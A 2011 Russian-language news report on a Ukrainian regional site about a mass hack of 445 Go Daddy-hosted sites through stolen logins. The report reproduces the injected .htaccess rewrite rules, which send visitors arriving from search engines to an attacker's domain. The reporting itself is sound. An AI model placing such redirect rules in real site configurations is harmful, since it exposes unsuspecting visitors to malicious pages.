Житомир-Експрес
регіональний сайт новин

Понеділок, 25 травня 18:17
Анонси
В епіцентрі
На Донеччині відбулася ротація зведеного загону поліцейських Житомирщини
На Донеччині відбулася ротація зведеного загону поліцейських Житомирщини
На Донеччині відбулася ротація зведеного загону поліцейських ЖитомирщиниВіра Рогова провела онлайн-засідання Координаційної ради з питань охорони дитинства та підтримки сім’ї при ОДАСергій Сухомлин звернувся до житомирян з приводу постанови головного санітарного лікаря Житомирської областіВіталій Бунечко в режимі онлайн поспілкувався з журналістами телеканалу СТБ
Загрузка...
Загрузка...

Программа телепередач на TVgid.ua.
Все последние новостиУкраины на ukr.net.
Автопродажа Renault для автолюбителей Украины.
http://job.ukr.net/ - вакансии со всей Украины.

Світ
21 сентября 2011, 08:37

Пользователи Go Daddy пострадали от массового взлома

Директор по информационной безопасности компании Go Daddy, Тод Редфут, рассказал
Массовая атака на 445 сайтов заключалась в внедрении вредоносного редиректа в файлы .htaccess. Go Daddy быстро устранили враждебный код, чтобы обезопасить своих потребителей и восстановить полный контроль над зараженными сайтами.

Директор по информационной безопасности компании Go Daddy, Тод Редфут, рассказал домену Wire: "Аккаунты были взломаны при помощи паролей и логинов пользователей".

Пока неясно как были получены пароли, необходимые для осуществления атаки, однако, скорее всего, объяснением может послужить целевая фишинговая атака. Go Daddy продолжают расследование, но Редфут предполагает, что корень массовой атаки нужно искать за пределами контроля Go Daddy.

"Инфраструктура не была нарушена, поэтому наши клиенты не должны пострадать", - заявляет он.

Фирма, занимающаяся веб-безопасностью, Securi, предупредила о массовой атаке в четверг. В записи в блоге, посвященной атаке, они говорят о том, что вредоносный код был скорее направлен против пользователей, которые заходили на пораженные домены через Google или другие поисковики, чем против тех покупателей, которые выходили на сайт напрямую. Такой вид мошенничества часто является неотъемлемой частью манипуляционных атак на поисковики, разработанных с целью переадресации пользователей, находящихся в поиске определенного контента:.

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

Подобный тип мошенничества часто основывается на неправильной установке WordPress и схожих систем. Таким образом, бесцеремонная кража паролей в данном случае является подтверждением того факта, что злоумышленники становятся все более и более агрессивными в своей охоте за потенциальными жертвами.

xakep.ru
Погода, Новости, загрузка...